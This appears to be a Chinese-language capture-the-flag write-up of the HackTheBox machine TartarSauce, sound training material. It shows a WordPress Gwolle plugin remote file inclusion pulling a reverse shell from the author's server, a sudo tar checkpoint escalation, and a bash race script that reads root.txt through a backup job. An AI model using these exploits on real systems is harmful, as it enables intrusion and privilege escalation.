本文已参与「新人创作礼」活动,一起开启掘金创作之路
勘探
nmap直接扫
root@kali:~/hackthebox/tartarsauce-10.10.10.88# nmap 10.10.10.88
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-22 12:21 EDT
Warning: 10.10.10.88 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.88
Host is up (0.098s latency).
Not shown: 65467 closed ports, 67 filtered ports
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 26.34 seconds
root@kali:~/hackthebox/tartarsauce-10.10.10.88# nmap -sCV -p 80 10.10.10.88
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-22 12:25 EDT
Nmap scan report for 10.10.10.88
Host is up (0.095s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.70 seconds
发现是一个完全的web,那么用dirsearch扫
80端口勘探
dirsearch可以发现这个网页中有robots.txt文件
指定了五个目录,不过,那五个都是兔子洞,我在那几个界面浪费了大量的时间。。。
但同时他也暴漏了一个地址/webservice
对这个地址用gobuster中字典爆破发现有/wp目录那是不是代表他有wordpress啊
既然有wp那么我们做进一步的探查
wpscan --url http://tartarsauce.htb/webservices/wp/
wpscan --url http://tartarsauce.htb/webservices/wp/ --enumerate p,t,u
wpscan --url http://tartarsauce.htb/webservices/wp --enumerate p --plugins-detection aggressive
这里作者用欺骗的方式,将wp版本更改成了2的版本,但其实还是1.5,所以wpscan要用aggressive模式
这一点,可以在插件的一个readme中找到
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ / / / | ___/ ___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
/ / |_| |_____/ ___|__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
...
[+] We found 3 plugins:
[+] Name: akismet - v4.0.3
| Last updated: 2018-05-26T17:14:00.000Z
| Location: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/
| Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
[!] The version is out of date, the latest version is 4.0.6
[+] Name: brute-force-login-protection - v1.5.3
| Latest version: 1.5.3 (up to date)
| Last updated: 2017-06-29T10:39:00.000Z
| Location: http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/
| Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/readme.txt
[+] Name: gwolle-gb - v2.3.10
| Last updated: 2018-05-12T10:06:00.000Z
| Location: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/
| Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
[!] The version is out of date, the latest version is 2.5.2
[+] Enumerating installed themes (only ones marked as popular) ...
...
提权至www-date
那么我们发发现有gwolle可以试一试gwolle的跨域文件包含
具体实现步骤是这样的(其实在searchspolit中可以看到漏洞作者写的exp)
1.用python打开一个微服务
python -m SimpleHTTPServer 12345
注意,你命令行打开的位置就是这个服务共享的位置
2.在分享的文件夹中创建一个回连shell脚本命名为wp-load.php,我使用的是/usr/share/webshells/php/php-reverse-shell.php这个msf的脚本,注意修改脚本内的host和port
注意为什么叫这个名字,其实是为了方便
└─# python -m SimpleHTTPServer 12345 1 ⨯
Serving HTTP on 0.0.0.0 port 12345 ...
10.10.10.88 - - [28/Dec/2021 19:38:11] "GET /wp-load.php HTTP/1.0" 200 -
10.10.10.88 - - [28/Dec/2021 20:07:40] "GET /b.sh HTTP/1.1" 200 -
连接测试的时候发现这个跨域访问会直接连接这个文件,所以这样不用加文件名
3.打开nc监听
4.用curl访问链接或者直接浏览器访问
curl -s http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.16.3:12345/
注意,端口改自己脚本中的端口,地址的端口最后必须加/
然后就能连接到了
提权至onuma
一般操作sudo -l发现tar有onuma权限
$ sudo -l
Matching Defaults entries for www-data on TartarSauce:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User www-data may run the following commands on TartarSauce:
(onuma) NOPASSWD: /bin/tar
那么利用漏洞
$ sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
tar: Removing leading `/' from member names
id
uid=1000(onuma) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)
有关于tar提权的其他方法和原理请参照与我另一篇文章
提权至root
find一下没有什么可以利用的
sudo 刚刚看了没有root权限的进程
用pspy查看一下进程
./pspy32
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2021/12/28 04:09:07 CMD: UID=0 PID=95 |
2021/12/28 04:09:07 CMD: UID=0 PID=936 | /usr/lib/policykit-1/polkitd --no-debug
2021/12/28 04:09:07 CMD: UID=0 PID=919 | /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
2021/12/28 04:09:07 CMD: UID=0 PID=9 |
2021/12/28 04:09:07 CMD: UID=0 PID=85 |
2021/12/28 04:09:07 CMD: UID=0 PID=83 |
2021/12/28 04:09:07 CMD: UID=0 PID=82 |
2021/12/28 04:09:07 CMD: UID=0 PID=81 |
2021/12/28 04:09:07 CMD: UID=108 PID=805 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
2021/12/28 04:09:07 CMD: UID=0 PID=804 | /usr/lib/snapd/snapd
2021/12/28 04:09:07 CMD: UID=0 PID=803 | /usr/bin/vmtoolsd
2021/12/28 04:09:07 CMD: UID=104 PID=801 | /usr/sbin/rsyslogd -n
2021/12/28 04:09:07 CMD: UID=0 PID=800 | /usr/sbin/atd -f
2021/12/28 04:09:07 CMD: UID=0 PID=80 |
2021/12/28 04:09:07 CMD: UID=0 PID=8 |
2021/12/28 04:09:07 CMD: UID=0 PID=799 | /usr/sbin/cron -f
2021/12/28 04:09:07 CMD: UID=0 PID=795 | /usr/lib/accountsservice/accounts-daemon
2021/12/28 04:09:07 CMD: UID=0 PID=794 | /usr/bin/lxcfs /var/lib/lxcfs/
2021/12/28 04:09:07 CMD: UID=0 PID=792 | /lib/systemd/systemd-logind
2021/12/28 04:09:07 CMD: UID=0 PID=79 |
2021/12/28 04:09:07 CMD: UID=0 PID=789 | /usr/sbin/acpid
2021/12/28 04:09:07 CMD: UID=0 PID=78 |
2021/12/28 04:09:07 CMD: UID=0 PID=77 |
2021/12/28 04:09:07 CMD: UID=0 PID=7 |
2021/12/28 04:09:07 CMD: UID=100 PID=676 | /lib/systemd/systemd-timesyncd
2021/12/28 04:09:07 CMD: UID=1000 PID=6558 | ./pspy32
2021/12/28 04:09:07 CMD: UID=1000 PID=6511 | /bin/bash
2021/12/28 04:09:07 CMD: UID=1000 PID=6510 | tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
2021/12/28 04:09:07 CMD: UID=0 PID=6509 | sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
2021/12/28 04:09:07 CMD: UID=0 PID=648 |
2021/12/28 04:09:07 CMD: UID=33 PID=6383 | /bin/sh -i
2021/12/28 04:09:07 CMD: UID=33 PID=6379 | sh -c uname -a; w; id; /bin/sh -i
2021/12/28 04:09:07 CMD: UID=0 PID=6365 |
2021/12/28 04:09:07 CMD: UID=0 PID=6252 |
2021/12/28 04:09:07 CMD: UID=0 PID=6250 |
2021/12/28 04:09:07 CMD: UID=33 PID=6249 | /usr/sbin/apache2 -k start
2021/12/28 04:09:07 CMD: UID=0 PID=6 |
2021/12/28 04:09:07 CMD: UID=0 PID=5971 |
2021/12/28 04:09:07 CMD: UID=0 PID=432 |
2021/12/28 04:09:07 CMD: UID=0 PID=426 | /lib/systemd/systemd-udevd
2021/12/28 04:09:07 CMD: UID=0 PID=425 | /sbin/lvmetad -f
2021/12/28 04:09:07 CMD: UID=0 PID=406 |
2021/12/28 04:09:07 CMD: UID=0 PID=405 |
2021/12/28 04:09:07 CMD: UID=0 PID=404 |
2021/12/28 04:09:07 CMD: UID=0 PID=401 |
2021/12/28 04:09:07 CMD: UID=0 PID=400 | /lib/systemd/systemd-journald
2021/12/28 04:09:07 CMD: UID=0 PID=4 |
2021/12/28 04:09:07 CMD: UID=0 PID=35 |
2021/12/28 04:09:07 CMD: UID=0 PID=348 |
2021/12/28 04:09:07 CMD: UID=0 PID=347 |
2021/12/28 04:09:07 CMD: UID=0 PID=34 |
2021/12/28 04:09:07 CMD: UID=0 PID=307 |
2021/12/28 04:09:07 CMD: UID=0 PID=306 |
2021/12/28 04:09:07 CMD: UID=0 PID=30 |
2021/12/28 04:09:07 CMD: UID=0 PID=297 |
2021/12/28 04:09:07 CMD: UID=0 PID=296 |
2021/12/28 04:09:07 CMD: UID=0 PID=29 |
2021/12/28 04:09:07 CMD: UID=0 PID=28 |
2021/12/28 04:09:07 CMD: UID=0 PID=272 |
2021/12/28 04:09:07 CMD: UID=0 PID=27 |
2021/12/28 04:09:07 CMD: UID=0 PID=26 |
2021/12/28 04:09:07 CMD: UID=0 PID=25 |
2021/12/28 04:09:07 CMD: UID=0 PID=24 |
2021/12/28 04:09:07 CMD: UID=0 PID=23 |
2021/12/28 04:09:07 CMD: UID=0 PID=22 |
2021/12/28 04:09:07 CMD: UID=0 PID=21 |
2021/12/28 04:09:07 CMD: UID=0 PID=20 |
2021/12/28 04:09:07 CMD: UID=0 PID=2 |
2021/12/28 04:09:07 CMD: UID=0 PID=199 |
2021/12/28 04:09:07 CMD: UID=0 PID=197 |
2021/12/28 04:09:07 CMD: UID=0 PID=194 |
2021/12/28 04:09:07 CMD: UID=0 PID=19 |
2021/12/28 04:09:07 CMD: UID=0 PID=18 |
2021/12/28 04:09:07 CMD: UID=0 PID=172 |
2021/12/28 04:09:07 CMD: UID=0 PID=171 |
2021/12/28 04:09:07 CMD: UID=0 PID=170 |
2021/12/28 04:09:07 CMD: UID=0 PID=17 |
2021/12/28 04:09:07 CMD: UID=0 PID=16 |
2021/12/28 04:09:07 CMD: UID=0 PID=15 |
2021/12/28 04:09:07 CMD: UID=0 PID=14 |
2021/12/28 04:09:07 CMD: UID=33 PID=1395 | /usr/sbin/apache2 -k start
2021/12/28 04:09:07 CMD: UID=0 PID=13 |
2021/12/28 04:09:07 CMD: UID=33 PID=1230 | /usr/sbin/apache2 -k start
2021/12/28 04:09:07 CMD: UID=33 PID=1229 | /usr/sbin/apache2 -k start
2021/12/28 04:09:07 CMD: UID=33 PID=1228 | /usr/sbin/apache2 -k start
2021/12/28 04:09:07 CMD: UID=33 PID=1227 | /usr/sbin/apache2 -k start
2021/12/28 04:09:07 CMD: UID=33 PID=1226 | /usr/sbin/apache2 -k start
2021/12/28 04:09:07 CMD: UID=0 PID=1209 | /usr/sbin/apache2 -k start
2021/12/28 04:09:07 CMD: UID=0 PID=12 |
2021/12/28 04:09:07 CMD: UID=0 PID=1145 | /sbin/agetty --noclear tty1 linux
2021/12/28 04:09:07 CMD: UID=0 PID=112 |
2021/12/28 04:09:07 CMD: UID=107 PID=1116 | /usr/sbin/mysqld
2021/12/28 04:09:07 CMD: UID=0 PID=1108 | /sbin/iscsid
2021/12/28 04:09:07 CMD: UID=0 PID=1107 | /sbin/iscsid
2021/12/28 04:09:07 CMD: UID=0 PID=11 |
2021/12/28 04:09:07 CMD: UID=0 PID=10 |
2021/12/28 04:09:07 CMD: UID=0 PID=1 | /sbin/init
2021/12/28 04:10:04 CMD: UID=0 PID=6580 | /lib/systemd/systemd-udevd
2021/12/28 04:10:04 CMD: UID=0 PID=6579 | /lib/systemd/systemd-udevd
2021/12/28 04:10:04 CMD: UID=0 PID=6578 | /lib/systemd/systemd-udevd
2021/12/28 04:10:04 CMD: UID=0 PID=6577 | /lib/systemd/systemd-udevd
2021/12/28 04:10:04 CMD: UID=0 PID=6576 | /lib/systemd/systemd-udevd
2021/12/28 04:10:04 CMD: UID=0 PID=6575 | cut -d -f1
2021/12/28 04:10:04 CMD: UID=0 PID=6574 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:04 CMD: UID=0 PID=6573 |
2021/12/28 04:10:04 CMD: UID=0 PID=6572 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:04 CMD: UID=0 PID=6571 | /lib/systemd/systemd-udevd
2021/12/28 04:10:04 CMD: UID=0 PID=6570 | /lib/systemd/systemd-udevd
2021/12/28 04:10:04 CMD: UID=0 PID=6569 | /lib/systemd/systemd-udevd
2021/12/28 04:10:04 CMD: UID=0 PID=6568 | /lib/systemd/systemd-udevd
2021/12/28 04:10:04 CMD: UID=0 PID=6567 | /lib/systemd/systemd-udevd
2021/12/28 04:10:04 CMD: UID=0 PID=6566 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:04 CMD: UID=0 PID=6583 |
2021/12/28 04:10:04 CMD: UID=0 PID=6582 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:04 CMD: UID=0 PID=6581 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:04 CMD: UID=0 PID=6584 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0 PID=6586 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:04 CMD: UID=0 PID=6596 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0 PID=6605 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0 PID=6609 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0 PID=6611 |
2021/12/28 04:10:04 CMD: UID=0 PID=6613 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0 PID=6615 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0 PID=6617 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0 PID=6618 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0 PID=6620 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0 PID=6622 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:04 CMD: UID=0 PID=6624 |
2021/12/28 04:10:04 CMD: UID=0 PID=6626 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0 PID=6633 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:04 CMD: UID=0 PID=6634 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0 PID=6637 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:04 CMD: UID=0 PID=6639 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0 PID=6643 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:04 CMD: UID=0 PID=6644 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0 PID=6647 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:04 CMD: UID=0 PID=6649 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:04 CMD: UID=0 PID=6650 |
2021/12/28 04:10:04 CMD: UID=0 PID=6653 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0 PID=6655 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0 PID=6662 | /bin/sleep 30
2021/12/28 04:10:04 CMD: UID=0 PID=6661 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:04 CMD: UID=1000 PID=6665 | /bin/tar -zcvf /var/tmp/.1beeeb196d0924b2bfdec12dc9ba71e68ba43b8c /var/www/html
2021/12/28 04:10:04 CMD: UID=1000 PID=6666 | gzip
2021/12/28 04:10:34 CMD: UID=0 PID=6672 | gzip -d
2021/12/28 04:10:34 CMD: UID=0 PID=6671 | /bin/tar -zxvf /var/tmp/.1beeeb196d0924b2bfdec12dc9ba71e68ba43b8c -C /var/tmp/check
2021/12/28 04:10:35 CMD: UID=0 PID=6674 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:35 CMD: UID=0 PID=6673 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:36 CMD: UID=0 PID=6675 | /bin/mv /var/tmp/.1beeeb196d0924b2bfdec12dc9ba71e68ba43b8c /var/backups/onuma-www-dev.bak
2021/12/28 04:10:36 CMD: UID=0 PID=6676 | /bin/rm -rf /var/tmp/check . ..
2021/12/28 04:10:36 CMD: UID=0 PID=6677 |
2021/12/28 04:10:36 CMD: UID=0 PID=6680 |
文件分析
发现有一个/usr/sbin/backuperer这个很可疑
这是这个文件的原理
cat backuperer
#!/bin/bash
#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------
# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check
# formatting
printbdr()
{
for n in $(seq 72);
do /usr/bin/printf $"-";
done
}
bdr=$(printbdr)
# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg
# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check
# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &
# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30
# Test the backup integrity
integrity_chk()
{
/usr/bin/diff -r $basedir $check$basedir
}
/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
# Report errors so the dev can investigate the issue.
/usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
integrity_chk >> $errormsg
exit 2
else
# Clean up and save archive to the bkpdir.
/bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
/bin/rm -rf $check .*
exit 0
fi
检查了这个sh脚本后我们研究了它的执行流程
大致就是
1.先创建一个脚本象征,写明了脚本上次运行的时间
2.删除上次的临时文件
3.把网页文件备份成一个压缩包的形式保存至临时文件夹
4.sleep30秒
5.在临时文件夹中创建一个check文件夹
6.把上次压缩的文件提取到check文件夹zhong
7.比较check文件夹中的内容和源文件夹中的内容的区别,如果一样九八零食文件删除掉
8.如果不一样,就将错问信息写入错误日志文件中,并将diff比较的内容,也就是两个比较发生错误的文件写入错误日志中
操作
那么我们的思路就有了,就是在上述脚本完成备份后休息的那三十秒,我们打开备份,修改其中的某个文件为/root/root.txt然后再把这个备份重新压缩好,把原来的备份删掉,之后打开错误报告查看root文件就是了
但是这么多的步骤我们肯定是做不到三十秒内敲完了
就需要写脚本
这里借用0xdf编写的脚本
#!/bin/bash
# work out of shm
cd /dev/shm
# set both start and cur equal to any backup file if it's there
start=$(find /var/tmp -maxdepth 1 -type f -name ".*")
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*")
# loop until there's a change in cur
echo "Waiting for archive filename to change..."
while [ "$start" == "$cur" -o "$cur" == "" ] ; do
sleep 10;
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*");
done
# Grab a copy of the archive
echo "File changed... copying here"
cp $cur .
# get filename
fn=$(echo $cur | cut -d'/' -f4)
# extract archive
tar -zxf $fn
# remove robots.txt and replace it with link to root.txt
rm var/www/html/robots.txt
ln -s /root/root.txt var/www/html/robots.txt
# remove old archive
rm $fn
# create new archive
tar czf $fn var
# put it back, and clean up
mv $fn $cur
rm $fn
rm -rf var
# wait for results
echo "Waiting for new logs..."
tail -f /var/backups/onuma_backup_error.txt
本文已参与「新人创作礼」活动,一起开启掘金创作之路
结果
onuma@TartarSauce:/dev/shm$ ./.b.sh
./.b.sh
Waiting for archive filename to change...
File changed... copying here
Waiting for new logs...
------------------------------------------------------------------------
Integrity Check Error in backup last ran : Thu Oct 18 19:42:26 EDT 2018
------------------------------------------------------------------------
/var/tmp/.02af91fa0edeab13fce3962cddc45efefc22da67
diff -r /var/www/html/robots.txt /var/tmp/check/var/www/html/robots.txt
1,7c1
< User-agent: *
< Disallow: /webservices/tar/tar/source/
< Disallow: /webservices/monstra-3.0.4/
< Disallow: /webservices/easy-file-uploader/
< Disallow: /webservices/developmental/
< Disallow: /webservices/phpmyadmin/
<
---
> e79abdab...
感谢
0xdf提供的脚本
上面提到的tar利用文章
